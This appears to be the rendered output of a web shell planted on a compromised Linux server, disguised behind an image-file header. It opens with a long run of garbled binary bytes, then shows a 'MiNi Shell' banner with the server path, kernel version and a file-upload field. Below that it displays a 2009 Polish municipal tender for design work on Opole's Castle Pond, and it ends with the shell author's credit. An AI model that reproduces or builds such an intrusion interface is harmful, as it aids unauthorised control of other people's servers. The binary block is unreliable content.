JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090224/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090224/38842-N-2009.html

<p class="kh_header"><b>Opole: Opracowanie dokumentacji technicznej i studium wykonalności do projektu pn. ODRA uRZEKA w Opolu, w części opracowanie dokumentacji projektowo - kosztorysowej na przebudowę Stawu Zamkowego przy ul.N.Barlickiego w Opolu</b><br>
<b>Numer ogłoszenia: 38842 - 2009; data zamieszczenia: 24.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Opole Urząd Miasta Opola , Rynek-Ratusz, 45-015 Opole, woj. opolskie, tel. 077 451 19 21, 077 451 19 22, faks 0 77 454 98 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej i studium wykonalności do projektu pn. ODRA uRZEKA w Opolu, w części opracowanie dokumentacji projektowo - kosztorysowej na przebudowę Stawu Zamkowego przy ul.N.Barlickiego w Opolu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rodzaj i zakres prac:
Obszar, dla którego należy opracować projekt budowlany i wykonawczy, obejmuje: działkę nr 11/17, k.m. 43, obręb Opole o powierzchni 1,3193 ha, z czego wody stojące zajmują powierzchnię 0,8735 ha, tereny rekreacyjno - wypoczynkowe - 0,4458 ha, a także tereny przyległe, tj. działki nr 11/16, 17/7, 20/4, k.m. 43, obręb Opole. 
A. Opis stanu istniejącego:
-obiekt położony jest w strefie ochrony konserwatorskiej,
-teren posiada aktualny MPZP,
-staw jest zasilany wodami z ujęcia podziemnego (studnia głębinowa) z terenu Toropolu przy ul. N. Barlickiego 13, odprowadzenie wód do kanalizacji,
-mury oporowe niecki stawu - żelbetowe z licznymi odkształceniami, 
-kamienne mury oporowe skarp do częściowego remontu, 
-ciągi piesze wokół stawu wykonane są z kostki betonowej i kamiennej z nieczynnym odwodnieniem, 
-schody betonowe wymagają przebudowy i budowy pochylni dla niepełnosprawnych, 
-fontanna z maszynownią podziemną i rząpia znajduje się w złym stanie technicznym, 
-oświetlenie niecki stawu zlokalizowane w murach oporowych w złym stanie technicznym,
-oświetlenie ciągu pieszego latarniami parkowymi (na tarasie górnym od strony parkingu, odrębny projekt w trakcie opracowania),
-elementy małej architektury - ławki i kosze do wymiany,
-zieleń wysoka, średnia i niska na skarpach wokół stawu z nasadzeniami z kwiatów sezonowych w murkach kamiennych bez wyraźnych cech kompozycji ogrodowej, do ewentualnej przebudowy.  

B. Założenia do projektowania:
1. Przebudowa Stawu Zamkowego powinna przewidywać:
-remont murów oporowych stawu i skarp wg zaleceń ekspertyzy konstrukcyjnej, opracowanej w grudniu 2008 r
-remont niecki stawu wg zaleceń ekspertyzy konstrukcyjnej przy uwzględnieniu lokalizacji instalacji nowej fontanny w niecce stawu,
-likwidację istniejącej fontanny i projekt nowej, w tym aranżację elementów wizualnych fontanny i otoczenia wraz ze sterowaniem, instalacją wod-kan i przepompownią (uwzględnić uzdatnianie wody) oraz nagłośnieniem (możliwość demontażu urządzeń w okresie zimowym), po zatwierdzeniu przedstawionej wersji roboczej przez Zamawiającego; szczegółowe wytyczne zostaną przekazane na etapie podpisywania umowy, obecnie do wglądu w Wydziale Ochrony Środowiska i Rolnictwa tut. Urzędu. Uwaga: przewiduje się możliwość wprowadzenia modyfikacji do ww. wytycznych w uzgodnieniu z Zamawiającym,
-oświetlenie ciągów pieszych i niecki stawu do przebudowy - oświetlenie posadzkowe ciągów pieszych, oświetlenie iluminacyjne niecki stawu, elementów zieleni po zatwierdzeniu przedstawionej wersji roboczej,
-częściowy remont ciągów pieszych (z udrożnieniem odwodnienia), przebudowę schodów betonowych i budowę pochylni dla osób niepełnosprawnych z budową odwodnienia ciągu wokół stawu,
-remont rurociągów, doprowadzających wodę do stawu i odprowadzających ze stawu oraz rekonstrukcję studni głębinowych - wg zaleceń ekspertyzy, opracowanej w grudniu 2008 r. 
-zieleń - inwentaryzację stanu istniejącego z projektem gospodarki drzewostanem 
i projektem nowych układów zieleni średniej i niskiej,
-elementy małej architektury - tablice informacyjne, ławki, kosze, stojaki dla rowerów, pojemniki na psie odchody; lokalizacja tablic informacyjnych po uzgodnieniu 
z  Zamawiającym. 
2.Dokumentacja powinna zostać uzgodniona z Opolskim Wojewódzkim Konserwatorem Zabytków (strefa ochrony konserwatorskiej).
3.Dokumentację projektową branży elektrycznej należy uzgodnić z Wydziałem Inżynierii    Miejskiej Urzędu Miasta Opola. 
4.Wykonawca przed opracowaniem projektów budowlanych przedstawi do akceptacji roboczą koncepcję przyjętych rozwiązań projektowych.
5.Projekt wymaga koordynacji z rozwiązaniami dotyczącymi projektu przebudowy amfiteatru (dokumentacja pracowni Biuro 87A s.c. z siedzibą w Opolu przy ul. Oleskiej 87a wykonanej na zlecenie Urzędu Miasta Opola). 
6.Dokumentacja musi być opracowana w sposób zgodny z ustaleniami określonymi w miejscowym planie zagospodarowania przestrzennego wskazanego terenu, wymaganiami ustaw, przepisami /zwłaszcza Prawo budowlane i Prawo zamówień publicznych oraz rozporządzeniach wykonawczych do nich/ i zasadami wiedzy technicznej oraz niniejszymi danymi do postępowania.
7.Projekt powinien zawierać wyniki badań gruntowo-wodnych na terenie działki dla potrzeb posadowienia  obiektów, spełniające wymagania rozporządzenia Ministra Spraw Wewnętrznych i Administracji w sprawie szczegółowych zasad ustalenia geotechnicznych warunków posadowienia obiektów budowlanych  oraz dodatkowe wytyczne inwestorskie i uwarunkowania związane z realizacją i jej przeprowadzeniem.
8.Dokumentacja projektowa powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu na służyć.
9.Projekt budowlany, będący częścią składową dokumentacji projektowej powinien umożliwić Zamawiającemu uzyskanie pozwolenia na budowę.
10.Dokumentacja projektowa będzie służyć jako opis przedmiotu zamówienia do przetargu na roboty budowlane w oparciu o ustawę o zamówieniach publicznych oraz do realizacji (na jej podstawie) pełnego zakresu robót budowlanych, niezbędnego dla użytkowania obiektu zgodnie z przeznaczeniem.
11.Dokumentacja projektowa w swej treści powinna określać technologię robót, materiały, maszyny i urządzenia w sposób nie utrudniający uczciwej konkurencji.
12.Dokumentacja projektowa powinna określać parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii, maszyn, urządzeń i wyposażenia.

Dokumentacja projektowo-kosztorysowa powinna zawierać :
a)	Dokumentację projektową, zgodną z rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, składającą się z elementów :

a.1) Projekt budowlany - w zakresie zgodnym z miejscowym planem zagospodarowania przestrzennego, z prawem budowlanym oraz szczegółowości zgodnej z rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego, w zakresie zgodnym z ww. założeniami do projektowania.
                    
      a.2) Projekty wykonawcze /przygotowane dla każdej branży osobno/, w zakresie o którym mowa w § 5 ww. rozporządzenia:


-dotyczące zmian lub likwidacji obiektów budowlanych albo podłączonych do nich sieci, kolidujących z projektowanym obiektem lub zamierzeniem budowlanym,
-architektury obiektu, obejmującej co najmniej rzuty, przekroje, elewacje, 
-detali architektonicznych,
-technologii podstawowej (wiodącej) w zamierzeniu budowlanym (jeżeli technologia występuje),
-konstrukcji obiektu,
-zabezpieczeń  mykologicznych i innych działań ochronnych.

a.3) Wszystkie niezbędne opinie, uzgodnienia i sprawdzenia rozwiązań projektowych w zakresie wynikającym z przepisów oraz wzajemne skoordynowanie techniczne opracowań projektowych wykonanych przez osoby, posiadające uprawnienia budowlane do projektowania w odpowiedniej specjalności, zapewniające uwzględnienie zawartych w przepisach zasad bezpieczeństwa i ochrony zdrowia w procesie budowy, z uwzględnieniem specyfiki projektowanego obiektu budowlanego.

a.4) Przedmiary robót, w zakresie o którym mowa w § 6-10 rozporządzenia powołanego powyżej.
a.5) Informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianą w planie bezpieczeństwa i ochrony zdrowia ze wskazaniem w szczególności, czy zakres robót obejmuje jeden z rodzajów wymienionych w art. 21a ust.2 ustawy Prawo Budowlane. Informacja winna uwzględniać warunki Rozporządzenia Ministra Infrastruktury w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia.
b)Specyfikacje techniczne, w zakresie o którym mowa w rozdziale 3 rozporządzenia powołanego powyżej.
c)Kosztorys inwestorski, opracowany na zasadach określonych w Rozporządzeniu Ministra Infrastruktury w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym wraz z zestawieniem wartości poszczególnych branż.

Dokumentację projektowo - kosztorysową należy skompletować w ilości :

Etap prac przedprojektowych           	
1.  Mapa do celów projektowych                      	    2 egz. (1+1 elektron.)
2.  Badania geotechniczne gruntu                              	    5 egz. (4+1 elektron.)
3.  Inwentaryzacja drzewostanu z opinią dendrologiczną      5 egz. (4+1 elektron.)
4.  Koncepcja 	3 egz. (2+1 elektron.)
5.  Wniosek o wydanie decyzji o środowiskowych uwarunkowaniach                  	    2 egz. (1+1 elektron.)
Etap prac projektowych	
1.	Projekt architektoniczno - budowlany wielobranżowy z informacją bezpieczeństwa i ochrony zdrowia	 5 egz. (4+1 elektron.)
2.  Projekty wykonawcze dla poszczególnych branż:
2.1	Projekt planu zagospodarowania terenu.
2.2	Projekt remontu ciągów pieszych, schodów, elementów małej architektury. 
2.3	Projekt remontu konstrukcji muru oporowego stawu.
2.4	Projekt remontu konstrukcji niecki stawu.
2.5	Projekt kanalizacji deszczowej do odwodnienia ciągów pieszych wokół stawu wraz z określeniem zasad poboru i odprowadzania wód ze stawu z ich uzdatnianiem.
2.6	Projekt oświetlenia ciągów pieszych i niecki stawu z projektem zasilania pompowni fontanny, projekt iluminacji drzew pomnikowych.
2.7	Projekt wykonawczy pomieszczenia pompowni wszystkie branże.
2.8	Projekt zieleni z projektem gospodarki drzewostanem.
2.9	Projekt przekładki urządzeń obcych.
2.10	Zbiór uzyskanych opinii, uzgodnień i sprawdzeń projektu.
     	 5 egz. (4+1 elektron.)
3. Projekt fontanny - opracowanie specjalistyczne w zakresie  technologii, programu fontanny, doboru dysz, doboru osprzętu do iluminacji itp.	5 egz. (4+1 elektron.)
4. Specyfikacja techniczna wykonania i odbioru robót budowlanych        	3 egz. (2+1 elektron.)
5. Przedmiary robót i kosztorysy inwestorskie w rozbiciu na branże (drogową, ogólnobudowlaną, instalacyjną, małej architektury, zieleń, oświetlenie i inne; odrębne w zakresie specjalistycznego projektu fontanny)   	3 egz. (2+1 elektron.)
6. Złożenie w imieniu Zamawiającego wniosku o wydanie pozwolenia na budowę.	2 egz. (1+1 elektron.)
 			                                   
UWAGA:
Wykonawca (Projektant) dostarczy 1 kpl. Dokumentacji projektowej w wersji elektronicznej (format pdf) - część opisową i graficzną. W przypadku zieleni - inwentaryzację stanu istniejącego z projektem gospodarki drzewostanem i projektem nowych układów zieleni średniej i niskiej należy wykonać w postaci cyfrowej w PUWG 2000 w postaci plików DXF z tabelami w EXCEL-u. Do pierwszego egzemplarza PB /egz. Inwestora/ dołączyć należy oryginały wszystkich uzyskanych warunków, uzgodnień, opinii czy sprawdzeń dokumentacji. 
				                                
Do obowiązków projektanta również należy :
-	uzyskanie aktualizowanych map do celów projektowych wraz z informacją terenowo-prawną,
-uzyskanie wszystkich niezbędnych uzgodnień, opinii i sprawdzeń dokumentacji, w tym:
-złożenie wniosku o wydanie decyzji o środowiskowych uwarunkowaniach; . 
-opracowanie i złożenie kompletnego wniosku o wydanie pozwolenia na budowę,
-wykonanie niezbędnych pomiarów inwentaryzacyjnych obiektu.

Zamawiający udostępnia w swojej siedzibie projekt scenografii przestrzeni niecki stawu

Termin realizacji: 6 miesięcy od podpisania umowy
Warunki gwarancji: 3 lata od daty odbioru końcowego

Informacje dodatkowe:

1).    Zamawiający nie przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt.6 Prawa.
2).   Zamawiający nie dopuszcza składania ofert częściowych, wariantowych i nie będzie wybierał najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
3.znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.nie podlega wykluczeniu z postępowania o udzielenie zamówienia.
Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie  Wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady: spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia spełnienia warunku posiadania uprawnienia do wykonywania działalności zgodnej z przedmiotem zamówienia Zamawiający żąda złożenia aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego przez urząd wydający nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.W celu potwierdzenia prawa do ubiegania się o zamówienie publiczne Zamawiający żąda złożenia oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 Prawa według wzoru załączonego do niniejszej specyfikacji.
W przypadku wspólnego ubiegania się o udzielenie zamówienia (art. 23 ust. 1 Prawa), poprzez zawiązanie konsorcjum, w celu potwierdzenia prawa do ubiegania się o zamówienie publiczne, na podstawie art. 23 ust. 3  Prawa, każdy Wykonawca wspólnie ubiegający się o udzielenie zamówienia składa oddzielnie wyżej wymienione dokumenty oraz oświadczenie.
3.  W celu potwierdzenia spełnienia warunku posiadania niezbędnej wiedzy i doświadczenia do wykonania zamówienia Zamawiający żąda złożenia wykazu zawierającego wykonanie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług stanowiących przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże minimum jedną pracę polegającą na wykonaniu wielobranżowej dokumentacji projektowej dotyczącej zagospodarowania terenu o wartości nie mniejszej niż 200.000 zł brutto -  wykaz należy złożyć zgodnie z załączonym wzorem do SIWZ. 
4.   W celu potwierdzenia warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający żąda złożenia wykazu przewidzianych do realizacji zamówienia osób, które posiadają następujące uprawnienia:
      - do pełnienia samodzielnej funkcji projektanta w specjalności konstrukcyjno -budowlanej bez ograniczeń w rozumieniu § 17 p.1 rozporządzenia Ministra Transportu i Budownictwa z 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z  2006 r. Nr 83 poz. 578 ), będącą członkiem Okręgowej Izby Inżynierów Budownictwa. Uprawnienia budowlane wystawione na podstawie wcześniejszych obowiązujących przepisów mają potwierdzać żądaną specjalność i  zakres bez ograniczeń.
  -  do pełnienia samodzielnej funkcji projektanta w specjalności architektonicznej  bez ograniczeń w rozumieniu § 16 p.1 rozporządzenia Ministra Transportu i Budownictwa z 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z  2006 r. Nr 83 poz. 578 ), będącą członkiem Okręgowej Izby Inżynierów Budownictwa. Uprawnienia budowlane wystawione na podstawie wcześniejszych obowiązujących przepisów mają potwierdzać żądaną specjalność i  zakres bez ograniczeń.
   - do pełnienia samodzielnej funkcji projektanta w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń w rozumieniu § 23 p.1 rozporządzenia Ministra Transportu i Budownictwa z 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z  2006 r. Nr 83 poz. 578 ), będącą członkiem Okręgowej Izby Inżynierów Budownictwa. Uprawnienia budowlane wystawione na podstawie wcześniejszych obowiązujących przepisów mają potwierdzać żądaną specjalność i  zakres bez ograniczeń.
   -  do pełnienia samodzielnej funkcji projektanta w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń w rozumieniu § 24 p.1 rozporządzenia Ministra Transportu i Budownictwa z 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z  2006 r. Nr 83 poz. 578 ), będącą członkiem Okręgowej Izby Inżynierów Budownictwa. Uprawnienia budowlane wystawione na podstawie wcześniejszych obowiązujących przepisów mają potwierdzać żądaną specjalność i  zakres bez ograniczeń.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 85</li>
<li>2 - termin realizacji - 15</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.opole.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Opola. Wydział Inwestycji Miejskich, 45-018 Opole, Plac Wolności 7-8, pok.118.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2009 godzina 10:00, miejsce: Urząd Miasta Opola. Wydział Inwestycji Miejskich, 45-018 Opole, Plac Wolności 7-8, pok 117b.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com